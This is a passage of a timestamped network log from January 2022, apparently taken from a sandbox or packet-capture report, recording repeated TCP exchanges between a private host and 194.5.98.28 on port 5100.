Jan 13, 2022 15:33:28.821808100 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.821958065 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.822048903 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.042084932 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.042143106 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.042243958 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.042315960 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.042427063 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.042467117 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.042520046 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.042557955 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.044044971 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.044085979 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.044123888 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.044140100 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.044164896 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.044166088 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.044203997 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.044219017 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.044243097 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.044280052 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.044281960 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.044321060 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.044354916 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.044358969 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.044395924 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.044398069 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.044437885 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.044466019 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.044477940 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.044538975 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.143017054 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.262564898 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.262615919 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.262653112 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.262680054 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.262691975 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.262731075 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.262732983 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.262770891 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.262809038 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.262815952 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.262849092 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.262850046 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.262887955 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.262893915 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.262927055 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.262952089 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.262964964 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263000011 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263003111 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263027906 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263041973 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263065100 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263078928 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263092041 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263118982 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263134003 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263158083 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263175011 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263196945 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263237953 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263240099 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263276100 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263286114 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263315916 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263331890 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263356924 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263362885 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263395071 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263395071 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263430119 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263453960 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263468027 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263500929 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263508081 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.263530016 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.263561010 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.265079021 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.265120983 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.265142918 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.265158892 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.265192986 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.265197039 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.265223026 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.265238047 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.265253067 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.265275955 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.265286922 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.265316010 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.265316963 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.265357018 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:29.265378952 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:29.265424013 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:33.211164951 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:33.427463055 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:33.427848101 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:33.428555012 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:33.661700964 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:33.662801981 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:33.935471058 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:33.935709000 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.151938915 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.152121067 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.421219110 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.421405077 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.689903021 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.690068007 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.719682932 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.719784021 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.720122099 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.720218897 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.720583916 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.720678091 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.720854044 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.720999956 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.937010050 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.937068939 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.937175035 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.937530041 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.937592030 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.937719107 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.937771082 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.937865019 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.937928915 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.938076019 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.938131094 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.938184977 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.938227892 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:34.938257933 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:34.938297987 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.156255007 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.156416893 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.156524897 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.156532049 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.156589031 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.156956911 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.157027006 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.157048941 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.157102108 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.157371998 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.157430887 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.157463074 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.157510042 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.157609940 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.157654047 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.157696962 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.157740116 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.157885075 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.157948017 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.158118010 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.158242941 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.158269882 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.158308029 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.158421040 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.158488989 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.158601046 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.158648014 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.158782959 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.158848047 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.159080982 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.160144091 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.330399990 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.375946045 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.375976086 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.375993967 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376009941 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376025915 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376025915 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.376063108 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376080990 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376084089 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.376097918 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.376117945 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.376194000 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376214027 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376238108 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.376240969 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376254082 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.376259089 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376276970 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376293898 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.376301050 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376321077 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376327991 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.376341105 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376358032 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376374960 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376375914 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.376391888 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.376405001 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.376424074 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.377249956 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.377314091 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.377391100 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.377595901 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.377643108 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.377701998 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.377909899 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.377929926 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.377959967 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.378072977 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.378173113 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.378211021 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.378253937 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.378314018 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.378353119 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.378592968 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.378700018 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.378736973 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.378784895 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.378958941 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.378983974 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.379007101 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.379023075 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:35.379023075 CET	5100	49799	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:35.379067898 CET	49799	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:39.646954060 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:39.863796949 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:39.864001989 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:39.881820917 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:40.154769897 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:40.154835939 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:40.160075903 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:40.205514908 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:40.438297987 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:40.442461967 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:40.659996033 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:40.705629110 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:40.994040966 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:41.264353991 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.268584013 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:41.547281981 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.580893993 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.581445932 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.581559896 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:41.582570076 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.584584951 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.584700108 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:41.800936937 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.801007986 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.801126003 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:41.801887989 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.801933050 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.802004099 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:41.802114010 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.802339077 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.802380085 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.802432060 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:41.802475929 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:41.802537918 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:41.888205051 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.017657995 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.017725945 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.017770052 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.017802000 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.017872095 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.018183947 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.018249035 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.018322945 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.018377066 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.018486023 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.018558025 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.018716097 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.018776894 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.019370079 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.019412041 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.019432068 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.019454956 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.019458055 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.019493103 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.019496918 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.019534111 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.019536972 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.019572973 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.019575119 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.019617081 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.019777060 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.019845963 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.019916058 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.019969940 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.020277023 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.020344019 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.155567884 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.155723095 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.236572027 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.236602068 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.236617088 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.236741066 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.237153053 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.237234116 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.237236977 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.237256050 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.237277031 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.237317085 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.237355947 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.237812996 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.237833977 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.237871885 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.237891912 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.237926960 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.237958908 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.238059998 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.238116980 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.238271952 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.238328934 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.240915060 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.240973949 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.240988970 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.241036892 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.241044998 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241063118 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241077900 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241132021 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.241169930 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241235971 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.241236925 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241276979 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241293907 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241305113 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.241309881 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241324902 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241341114 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241355896 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241369009 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.241373062 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241390944 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241405964 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241421938 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241437912 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241453886 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241465092 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.241471052 CET	5100	49801	194.5.98.28	192.168.2.3
